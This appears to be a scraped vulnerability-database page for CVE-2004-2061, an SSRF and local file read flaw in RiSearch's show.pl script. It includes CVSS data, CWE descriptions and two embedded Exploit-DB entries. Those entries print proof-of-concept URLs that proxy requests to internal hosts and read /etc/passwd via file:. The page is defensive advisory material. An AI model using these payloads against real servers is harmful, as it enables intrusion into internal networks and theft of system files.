CVE-2004-2061
published 2004-07-27CVE-2004-2061: RiSearch 1.0.01 and RiSearch Pro 3.2.06 allows remote attackers to use the show.pl script as an open proxy, or read arbitrary local files, by setting the url…
PriorityP337critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
5.70%
92.1th percentile
RiSearch 1.0.01 and RiSearch Pro 3.2.06 allows remote attackers to use the show.pl script as an open proxy, or read arbitrary local files, by setting the url parameter to a (1) http://, (2) ftp://, or (3) file:// URL.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| risearch | risearch | — | — |
| risearch | risearch_pro | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay
exploitdb·2004-07-27
CVE-2004-2061 RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay
RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay
---
source: https://www.securityfocus.com/bid/10812/info
RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters.
A remote attacker may exploit this condition in order to launch attacks against local and public services in the context of the site that is hosting the vulnerable script.
http://www.example.com/cgi-bin/search/show.pl?url=http://www.google.com
http://www.example.com/cgi-bin/search/show.pl?url=http://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=http://localhost:8080
http://www.example.com/cgi-bin/search/show.pl?url=ftp://192.168.0.1
http://www.exampl
Exploit-DB
RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access
exploitdb·2004-07-27
CVE-2004-2061 RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access
RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access
---
source: https://www.securityfocus.com/bid/10812/info
RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters.
A remote attacker may exploit this condition in order to launch attacks against local and public services in the context of the site that is hosting the vulnerable script.
http://www.example.com/cgi-bin/search/show.pl?url=file:/etc/passwd
No writeups or analysis indexed.
CWE
Unintended Proxy or Intermediary ('Confused Deputy')
mitre_cwe
CWE-441 Unintended Proxy or Intermediary ('Confused Deputy')
CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')
The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.
If an attacker cannot directly contact a target, but the product has access to the target, then the attacker can send a request to the product and have it be forwarded to the target. The request would appear to be coming from the product's system, not the attacker's system. As a result, the attacke
CWE
Server-Side Request Forgery (SSRF)
mitre_cwe
CWE-918 Server-Side Request Forgery (SSRF)
CWE-918: Server-Side Request Forgery (SSRF)
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data.
Scope: Integrity. Impact: Execute Unauthorized Code or Commands.
Scope: Access Control. Impact: Bypass Protection Mechanism. By providing URLs to unexpected hosts or ports, attackers can make it appear that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy
http://marc.info/?l=bugtraq&m=109095196526490&w=2http://secunia.com/advisories/12173http://securitytracker.com/id?1010788http://www.osvdb.org/8265http://www.osvdb.org/8266http://www.securityfocus.com/bid/10812https://exchange.xforce.ibmcloud.com/vulnerabilities/16817http://marc.info/?l=bugtraq&m=109095196526490&w=2http://secunia.com/advisories/12173http://securitytracker.com/id?1010788http://www.osvdb.org/8265http://www.osvdb.org/8266http://www.securityfocus.com/bid/10812https://exchange.xforce.ibmcloud.com/vulnerabilities/16817
2004-07-27
Published